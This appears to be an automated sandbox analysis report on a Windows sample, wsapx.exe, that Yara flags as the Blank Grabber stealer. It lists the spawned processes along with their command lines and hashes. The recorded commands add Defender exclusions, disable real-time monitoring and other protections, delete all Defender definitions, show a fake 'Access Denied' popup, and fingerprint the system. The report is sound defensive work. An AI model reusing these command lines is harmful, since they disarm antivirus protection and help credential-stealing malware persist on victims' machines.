                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                              x-ratelimit-limit: 5
                                                                                                                                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                                                                                                                                              x-ratelimit-reset: 1734075487
                                                                                                                                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4lllrWnMiPrHeZ3hKh5y1SCJz5d9pCBQSw7m1rePD9qkRF5P0A8nYrAcLtSpqV726obINY31CIdI6NlQG1V3pMGyA5tVsJ8lUVZq%2FmobiLUJ8quIRCmHsarj%2BDaQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              Set-Cookie: __cfruid=4a3d3e501b1e2428812603716b0f256d8644b9af-1734075486; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                              Set-Cookie: _cfuvid=9cJeKDbCz.ZFeL4K6jS.s_pRajFY0tKlwFpKAskX.VA-1734075486542-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f144ae79dee7d26-EWR


                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:02:37:15
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\wsapx.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff7c71b0000
                                                                                                                                                                                                                                              File size:7'839'456 bytes
                                                                                                                                                                                                                                              MD5 hash:E302186AE6217D48FC6EEF1FE780EC26
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2152150044.0000015A08634000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2152150044.0000015A08632000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:02:37:16
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\wsapx.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff7c71b0000
                                                                                                                                                                                                                                              File size:7'839'456 bytes
                                                                                                                                                                                                                                              MD5 hash:E302186AE6217D48FC6EEF1FE780EC26
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2648275073.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2653293501.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2643435154.000001C87B04B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:02:37:19
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:02:37:19
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:02:37:19
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:02:37:19
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:02:37:19
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:02:37:19
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:02:37:20
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:02:37:20
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:02:37:20
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                              Start time:02:37:20
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                              Start time:02:37:20
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
                                                                                                                                                                                                                                              Imagebase:0x7ff642d20000
                                                                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                              Start time:02:37:20
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:02:37:20
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                              Imagebase:0x7ff644170000
                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:02:37:20
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:02:37:20
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                              Imagebase:0x7ff74c130000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:02:37:23
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:02:37:23
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                              Start time:02:37:24
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                                              Imagebase:0x7ff64eea0000
                                                                                                                                                                                                                                              File size:77'312 bytes
                                                                                                                                                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:02:37:24
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                              Start time:02:37:24
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                              Start time:02:37:24
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                              Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                              Start time:02:37:24
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                                              Imagebase:0x7ff64eea0000
                                                                                                                                                                                                                                              File size:77'312 bytes
                                                                                                                                                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                              Start time:02:37:24
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                              Start time:02:37:25
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                              Start time:02:37:25
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                              Imagebase:0x7ff74c130000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                              Start time:02:37:27
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                              Start time:02:37:27
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                              Start time:02:37:27
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                              Imagebase:0x7ff74c130000
                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                              Start time:02:37:28
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

